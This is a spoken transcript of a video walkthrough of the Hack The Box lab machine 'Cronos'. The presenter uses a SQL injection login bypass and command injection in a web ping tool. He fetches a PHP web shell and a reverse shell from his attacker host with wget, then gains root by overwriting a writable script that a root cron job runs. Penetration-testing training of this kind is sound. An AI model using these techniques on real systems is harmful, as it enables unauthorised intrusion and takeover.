Hello, welcome back to Sabretooth and Nethemba, where we care about your security. Hack the Box Friday. Let's take a look. Machines. Retired machines. The next one is, don't forget we're doing these in release order, and as you can see we've covered all of these so far. The next one up is medium Cronos. Then we've got a few easy ones. Grandpa, Granny, we've got a medium, and then insane. That's the one I'm quite anxious about. But hey, that's fine. We're not doing that today. Today we're doing Cronos. The last box we did was convert my video. Oh yes, the challenge which I completed in 30 minutes. We've not got too many in medium here. So I'm going to add the subnode. We're also going, let's connect to the network. Our IP address is 10.10.14.14. That's very nice. And as well as this, we can create a new box here, Cronos, and okay. So we're going to make that directory, and then go into that directory. Finally, open a few of these. Nice. And then we can start the system up. I should have done that anyway because it takes 2 minutes, doesn't it? So I never learn, do I? I never learn. Spawn machine can take up to 2 minutes to do this. So what would this be? 12, because that was 10.10.10.10, hence 10.10. And then we did Arctic, which was 10.10.10.11. So this one should be 10.10.10.12, I think. So we're going to nmap. Joe, let's do something different with nmap. I generally do STV to get TCP scan with version scanning, and then I put all ports, and then I put in the IP address, right? Let's do something different. So instead of doing STV, if we do T5, so it goes like T0, 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 T. Oh, T0, T1, T2, T3, T4, T5, right? And these are scanning levels. So T1 and T2, I've got a mark on my violin, one of my violins. Oh, it's actually come off, that's rosin. Okay. T1 and T2 are good movers. Very slow and very stealthy, whereas T4 and 5 sort of like blazingly fast but noisy as anything. So you wouldn't use this if you're trying to avoid detection, but in this case it doesn't really matter. I'm actually going to run A as well and see if that works, because what A does, it does versioning, OS detection, and it runs scripts and everything. So let's see now if this is that not even right? I'm coming back when this is done. I thought I'd done it. Okay, back when I get the IP. Okay, I thought I'd come back now because it's been 2.5 minutes, and any time now we should be getting the green line of success. There it is, and this pops up. Oh, 10.10.10.13. So 12, I guess, was taken offline at some point. Maybe it just didn't work or something was wrong. So let's run the blindingly fast nmap scan, but the fact that we're using the A flag means that it's going to slow down anyway, because it's got all these scripts to do and stuff. But I mean, it's worth a try instead of just doing the regular, just to show some of these other options of nmap rather than just using the same ones all the time. And if I like this, I may do this as the default in future. Giving up on port because retransmission cap hit. Okay. So the connect scan is nearly done already. The service scan is already a third done as well. And now it's doing a script scan as well. Oh my god. Do you see what I mean? This is like blindingly fast, 40 seconds, and it's got all this information for us. So let's take a look. And we'll see how this compares to a regular nmap scan that I've been doing, STV or ports, and we'll see what comes back. And we'll make that comparison just so you can see what's happening. We've got the SSH, and it actually shows the host key. It's got RSA key and ECDSA, etc. 53 is open. Now that is interesting. 53 is the domain controller, pretty much. I mean, DNS server. We will look into that, I think. And then we have the web port, and it shows that it's the default Apache page, and it shows that we're running Linux. We've got Ubuntu Linux, Ubuntu Linux, Ubuntu Linux, right? So it gives us a lot of information in 40 seconds. We're going to compare that with this. So it takes the same, about 40 seconds, but here all we've got is 22, 33. We've got ISC bind. Did that say that here? It did, yeah, I didn't even notice. So we've got a little bit less info. But nice, that wasn't too bad. Good. So we've never looked at port 53 before, have we? So let's do that. What I'm going to do is use NS lookup. I don't know if I put the IP in here or in a minute. So we're going to use the DNS server 10.10.10.13. And then now that it's using the DNS server on port 53, we are looking up 10.10.10.13. So it's querying itself, really. Okay, so from this we've got ns1.cronos.htb. Now that's quite useful to have that information, because now we know that Cronos.htb is the qualified name, so we can put that into our what's the word, etc host file. We can do a zone transfer. For the life of me, I can never remember. It's AXFR. I think, hang on, let's see if I can remember how to do this. Dig, is dig installed? Why is this not even typing anything? What's going on? I'll change to a different thing then. Dig, AXFR, I think that's right. Yeah, there we go. So dig, I'm going to have to look at the help for this. I'm determined not to look it up on Google here. So dig AXFR, and then we've got here global server with @. So maybe that would work just with at 10.10.10.13. Would that work just like that? Let's try ns1.cronos.htb. That was the other one, I think, wasn't it? Couldn't get address. Okay. Transfer failed. So I must be doing something wrong. So let me just take a look at this. Using dig for zone transfer. I don't do this often at all. Generally, I work on web. My specialty is web. But we could definitely, hang on, that looks good. Hang on, the previous one, because it's got here subdomain discovery. So let's take a look here. What is a zone transfer? We don't really need, I'm going to do nmap. Is this the same box? It looks like exactly the same box. I don't want to be looking at this if it's the exact same box that we are doing. But it looks like other people have the same idea to do a zone transfer. Come on, there we go. So how does this work? Dig AXFR, and then we've got yourdomain.com. And then this, okay, let's try that. So I think I might just have these the other way around. If I do that as that, and then I put the @ here, is it because it's not in my host files? So sudo nano etc hosts. And then here we have 10, 10, 10, 13 Cronos.htb. Okay. So it's still not working here. I'm not sure what I'm doing wrong with this zone transfer. I'm going to look this up a little bit more and then I'll be back. I don't want to do that and waste time here. I'm back. I think I've just got this in the wrong order. So I think I need to do that here because that's the DNS. So when I'm looking at 10, 10, 10, 13. Okay, so it looks like I'm not able to transfer. I'm not able to transfer this, which is a bit of a shame, really, because I thought I might be able to get a zone transfer going on this. But I'm evidently not. Hang on, that's 13, 10, 10. Oh, okay, backwards. I'm evidently not able to... Okay, I just need to get rid of the NS1. I just need to put the actual domain. That's me being an idiot. But I'll tell you what, we got there, so trial and error. I don't use this very often. I especially don't use dig. I can't remember what I used to use when I had to do it for OSCP. But dig is decent. So the information we've got here is that we've got NS1. Hang on, let's make a note of this. We've got Cronos.htb, right? Hang on, let me just put here zone transfer. We've got Cronos.htb. We've got ns1.cronos.htb. We've got admin.cronos.htb. We've got www.cronos.htb. That could be it. That could be it. So updates etc hosts with the above list. We could also probably do this with GoBuster and Fuff, and quite honestly I want to just give that a go just to show you how it would work. If you don't like doing zone transfers and it's not something you're interested in doing and so on. So let me update this first. Okay, so how we would do this with GoBuster, I think, is GoBuster, we use DNS, in which case we'll just put in Cronos.htb, then we'll give it a word list, which we can do as tools. Let's do sec lists, and then discovery, and then is the DNS here? There is DNS, and under here we've got like all of these. So we'll just do the first one, BitQuark, because I'm not too bothered about doing this. I'm just trying it out to see what happens. Shorthand D in D. Okay, so I wonder if we can just go for DNS here. Required flags domain not set. Okay. In that case, D goes there. And you can see it's found www, ns1, it's found admin. Okay, www, ns1, admin, and then the main. So it seems to have found the same. So you can do this with, GoBuster as well. Can achieve this with GoBuster 2. You can also do it in Burp Suite, and that might surprise people, but you can do this in Burp Suite. You can do this in using the intruder. You just replace the host field in the request and things like that, and you can do it with something called Fuff as well. But anyway, I'll leave this running just to see if it finds any others. Can I type here now? I can. That one I can't. That one's dead for some reason. Now it works. Oh no, I've closed it. Right. So there we go. We have all of these things. So we can go to Cronos.htb first. Nope. It's gone on to Google because it's crap. Okay, so we've got not secure, Cronos, documentation, Laracasts, news forging, GitHub. Interesting. We'll view the source of this. And we've got links to actual websites, which are out of scope. So we're not going to do that. What we can do is search for robots.txt. That's not good. And then I suppose we can just run a GoBuster on this. There's already a GoBuster running here, but we'll use another GoBuster. This time we're going to do directory with the URL, and then the word list we can do tools, word list, sec list, and then we'll use one of the RAF lists, I think, this time. Discovery, web, raft, large, directories, lowercase .text. We'll try that. So this is running. I could give it more threads. In fact, I think I don't know. It's running pretty quickly. I don't want to overload it if this is running as well. I could have given this more threads. That's tempting. Let's cancel that. Let's run it again with threads 100. See what happens. See how quick it goes now, because it got to 14% in all that time, and now it's already on 2%. So it's going to catch up relatively quickly. I'm quite happy to wait for this. But whilst we're waiting for this, we also had http www.cronos.htb as well. Is there any difference? Doesn't seem to be. We also had http ns1.cronos.htb. Got a default page here. Okay, so let's look for robots here. We can also run another GoBuster, perhaps, but maybe we should wait until one finishes first, rather than having 3 going at once. So we'll leave that there. What was our other one? Admin, wasn't it? So we will go admin.cronos.htb as well. And we have a add. Okay, that's weird. We have a login form here. Okay. So we'll try admin and admin, because that's what we do. We try admin password. We try admin root. We try some basic SQL injection. Oh, okay. SQL injection lets us in. Lol. Nice. Okay. So this shows an admin login, which we can gain access to with one, which is if you don't know how this works, say that the statement is this, right? Select, whatever from the database, or select whatever columns from the table, from the users table, where username is whatever we enter here, entry 1, and password is entry 2, right? That's what it would look like. Select whatever from users and it will match the username and the password. Now, if we put in this or 1 equals 1, followed by 2 things, what happens is our entry is this. This or 1 equals 1, like that, right? So now it's selecting whatever from users where the username is blank or where 1 equals 1. Now 1 always equals 1, right? So it's going to match that as true, and it's going to grab the first thing in the first row in the table, which in this case is the admin row, right? And then what this does is that comments out, it's a comments out all of this, so it doesn't even check the password. All of that's ignored. So all it's doing is matching 1 against 1 and grabbing the first entry. So now we have access to the admin. There we go. Lovely, isn't it? Good. So we are shown this, and I've got a good idea what to do here, because this is very similar to something in the damn vulnerable web application DVWA, where you can ping a IP address and execute that, and it'll take a while to run. Okay, and if you put in because what's going to happen is this is going to send, hang on, let me just see if it works first before I start explaining it, because it might not. It does work. So this is going to right, let me get this right. Let me show you exactly what's happening. It's running ping in the background. Because we choose ping from here, it's running the command ping on the back end, and it's going 8888, right? And that's what happens. Okay, and the result of that is returned. Now, in Linux, if you do that, that's the end of a command, and we can now put any other command. Like, who am I? So it first runs that. Oh, I'll have to kill it, so maybe not. Yeah, there we go. So it first runs that, and once that command's finished, it runs the second command. So what's happening is exactly that. And I do that, it'll first run the first one, and then afterwards, it will run the second one. Now, if I execute this, it's going to take a while. You can see it's still loading. Ping seems to take absolutely ages, whereas traceroute, I think, is instant. Yeah, absolutely. So we're going to stick with traceroute because that makes the most sense. Nice. Good. We can use 8.8.8.8 that who am I to gain RCE. And I'll take a screenshot of that as well. So this is just command injection. It's quite a dangerous thing. And if you've used the DVWA, you'll see this exact example pretty much. Okay, it's not called NetTool version 1, but similar thing, right? Technically then, we can do all sorts. We can do like cat etc password. And we can basically run whatever we wish here. Now, as much as we can try a reverse shell, what I'd quite like to do is use the C99, because at least then, well, I want to see if it works, to be fair. I want to see if it works, to be fair. I just love C99. It's just great. So we'll try this. We'll try this. We are going to shells, right? And C99 doesn't always work, but we can try this. We can go wget http 10.10.14.40. Hang on a minute, I've not started my thing, have I? Sudo python 3 module http server on port 80. So what we're going to do that, followed by c99.php. So we're going to execute that, and that will upload that file, and hopefully, with any luck, we can get c99.php here. Okay, we can't. So this time it's not actually working. Sometimes it gives 500 code if it doesn't work. But it has actually uploaded it. It just won't run. But we can use a bash reverse shell, or we can upload the PHP reverse shell and load it in the browser, or anything like that. Now I'm not sure, to be fair. I'm not sure which one to do. Should we try the bash shell instead? What about this one? Let's try using that. 10, 10, 14, 14. And we'll put that on 1, 2, 3, 4. So let me just copy that. And CLVP 1, 2, 3, 4. So we've got a listener going. I'm going to execute that. Do we get a shell back? We actually don't on this occasion. So I think what I'm going to do then is nano the PHP reverse shell. We may as well try it this way. Make sure that the HackTheBox IP is there, so we don't want that one. We do want this one, and make sure that's 1414. And then we're going to run this again. And then we're going to wget pretty much the same, except PHP reverse shell.php. Right, we're going to run that. Let's make a copy of that. We can see if that's uploaded or not just by doing ls. And you'll see that it is here as well as C99. So really, hang on, let's clear this. With that running, we should get a shell back. By doing that. So who am I? www.data ID, and there we go. Nice. So far, this is quite a straightforward box, with exception of needing to do a zone transfer. Speaking of zone transfers, have these finished. That only found those 3. This one, nope. This one, nope. I don't even know where the other one went. Yeah, I don't know where my other one went, but I don't really care. It doesn't seem important. LS, so we're here, are we? Let's go into home. LS nullis. Okay, cd nullis. Cat user.text. Okay, nice. We've got our first flag straight off. So we're limping now. cd into temp. Okay. Yep, there we are. So wget http, hang on a second. I actually need to start the Python server. Sudo python 3 http server on port 80. 10 10 14 14 limpies dot chmod x and then run limpies. Hooray! Okay, so it's just a case of looking through to see what this finds. So back when I was doing OSCP, that was actually before limpies was a thing, and there were Linux exploit suggesters and things like that, but most of what limpies runs I would check for manually. And if you have that book that I've been talking about and I've shown you once, hang on, I've got it here. I'm not sure if you can see that, this RTFM. It has pretty much everything you need in here, but Limpies does most of it anyway. And from what I know, Limpies was never restricted or banned in the OSCP exams. So, okay, it looks like it's going to be quite a big system. It's caching directories, and there seems to be quite a few of them. We're obviously going to be looking for red, yellow as a definitely look at this. Am I in frame? I am in frame. Could do with being down slightly, perhaps. How's that? That's good. But anything red is also worth taking a look. Everything else you can pretty much ignore, I guess. Now, I don't know how long this is going to take, so I think I'm going to pause this video, and once Limpies is complete... Forget what I was about to say. Let's go through the Limpies output, or at least make a start on it. I'll say once it's completed, I'll come back, but that's fine. Unmounted file systems. Okay. Cronos VG root. Huh. Not sure what to do with that. I might be able to mount them if I need to, but not right this second. Go into that if I need to do it. We have some, I mean, it's vulnerable to Dirty Cow apparently, and Dirty Cow 2. We've used these in the past and we know they kind of work. So that's always a nice thing to fall back on if we need it. Yeah, I think everything looks pretty fine. And then Linux Exploit Suggester also has 3 more. Let's keep looking. Oh, hang on. That wasn't me, mate. It's doing its thing. If you look on this side here, it's moving as the more output appears. So let's just take it slowly. Wow. Okay, we've got a red-yellow thing. So this must be the, with this, it shows me it must be the Cronjobs. It must be the Cronjobs. I hate that this happens, look. See it moving, and it's just messing everything up. We should just stay still. This has to be cron. Yeah, it says it here. Cron monthly, cron hourly, cron daily. Okay, and then this one, taking a look at this, because we've got 5 stars, it looks like it could run every minute, and it's run as root. Okay, I'll use PSPy in order to confirm that, but Limpies shows Cronjob. I'm going to put in bracket here yellow, red, so we know that it was properly highlighted. We can confirm it with PSPy, so let's do that anyway. I'm not even going to look through the rest. I can always come back to it later if I need to. Generally, I'd say look through all your enumeration first, but when you get something like this, it's almost a surefire thing that that's the way in. Oh, I didn't even check, did I? Uname a 64-bit system. Okay, so wget http, is that still running? It is still running. 10 14 14 pspy 64. Chmod that, make it executable, and then pspy 64. So we should see that every minute there's a cron job running as root. At least that's what it kind of said. At least that's what I could see from the Limpies output. So we just need to wait for a bit. Oh, I've just realized I forgot to do the timeout thing. So in order to, I'm going to kill this, and then my shell's going to go. But that doesn't matter. I can just run it again from the website. It should already be here under my, yeah, this one, right? No, it wasn't the bash shell. It was the PHP reverse shell. It's already there. Okay, cool. So I don't have to worry about that. Let's see when this thing runs. Now, as a matter of fact. So as root, let's just take a copy of this, all of this, then I can look over it in my own time. PSPy 64 shows, so we'll look over what this does in a moment. Kill that. That kills my shell. We're going to grab it again just by running the file again. There we go. Let's take a look at this Cronjob. What does it do? Using PHP, it runs var www laravel artisan, and then it has schedule a run. But it's running this script here. So the first thing we need to check is, can we overwrite the script? Because if so, and we know it runs every minute, then we're laughing. LSL. It's owned by www data, and as we are www data, we should be able to write into this file. Okay, this is going to be really simple then. It's going to be really simple. Okay, so root runs this, and we can overwrite it. Nice. Good. I guess. At least I guess that's good. So it's running that with PHP. So I need to put in some kind of PHP shell, don't I? I'll tell you what is interesting, what I could do. What if I... Hang on a minute. Let's change this. Print working directory. var www admin. Okay. So let's go there. Just have a look around. So we have the PHP reverse shell already there. What if I copy PHP reverse shell.php? If I copy that to here, overwrite artisan with this PHP shell. Now, you do realize that it's going to try and connect to port 1234, and I'm already connected via 1234. Therefore, I'm going to quickly kill my shell and then get the shell again, I think. I'll explain this on here in a minute. I want to see if it works first. So we're going to do that, kill that, do that, and wait. And then when the cron job runs, it could run that PHP code and send me a shell back. I don't know if it's that easy or not, because I've killed my listener and I've now got a new listener. And I'm kind of hoping that's it. It means I don't have to upload anything else or figure out what code I'm going to do. Who am I? Root. Okay, I'm going to be right back because I've just heard my doorbell, so I'll be back in a second. Okay, I picked up my parcels. That's fine. The guy hadn't already gone by the time I got there, and that was a bit of a bad place to stop, just as we were getting root. But you see how that worked? I'll type it here. So we copy the existing PHP shell to this file, knowing that root is running it with PHP, right? We then quickly kill our existing shell and restart the listener. And then you find that we are actually there, I guess. Good. So the only things we need to do now is obviously grab what we need. Cat root / root.text. No, oh, forget it. Cat root / everything. There you go. That'll do. Good. Let's answer these. How long have we been? It can't have been that long. Not that long at all. Like 40 minutes, if that. Right. Shall we go on to guided mode now? How many TC ports? 3. What subdomain is serving a login page? Admin. Okay. Admin dot Cronos.html if you really want to be picky about it. Because it said what subdomain of Cronos.html, so I don't think I needed to do that, right? What is the heading at the top of the web page? I don't know. Something, something, something. NetTool and something there. NetTool v0.1. Sure, that's a V. What user are we running as? That's a great question. What did it ask? Oh, www data. I thought it was asking about the other user. Submit the flag. Okay, we can do that. We can do that. That's here. I do like switching back to the guided mode. Hang on, we've not been looking at the hints either. Let's take a look at the hints. Scan the host with Nmap. Okay. Do a zone transfer. Yeah, fine. Or you can just use GoBuster or for Burp Suite, right? SQL injection. Okay, fine. Exploiter command injection vulnerability. Yep. So far we ain't doing bad, are we? So I think that was really simple. In fact, I mean, we're going to go piece of cake. Like the easiest. That was so simple. And then here, look at crontab. See, that's how you do it manually, but I used both Limpys and PSPy. What is the full path to the file passed to PHP in a cronjob? Yes, good question. That was this one, wasn't it? Does www data have write permission? Well, yes, obviously. Yep, did that. And then submit root. That's it. Easy box. How is this one medium? I don't understand how this one is medium and Arctic is easy, because that was a nightmare. That was a nightmare, Arctic. With the cold fusion, and then the reverse shell wouldn't work, and we needed like shells within shells or whatever it was. It's mental. So I think they've got those two labels flipped, quite honestly. Cronos, very simple system. Thank you for joining. I truly appreciate all your support. The number of subscribers is growing quite fairly steadily, which is nice, but we still need more. Only half the people who are watching are subscribed, so I'd like to get that to like 2/3 if possible. That'd be great. Please leave a like, please share the video around, share the playlist around if you can, and please visit Nethemba.com for all your pen testing needs. Thank you so much, and I'll see you next time for Try Hack Me Tuesday. Goodbye.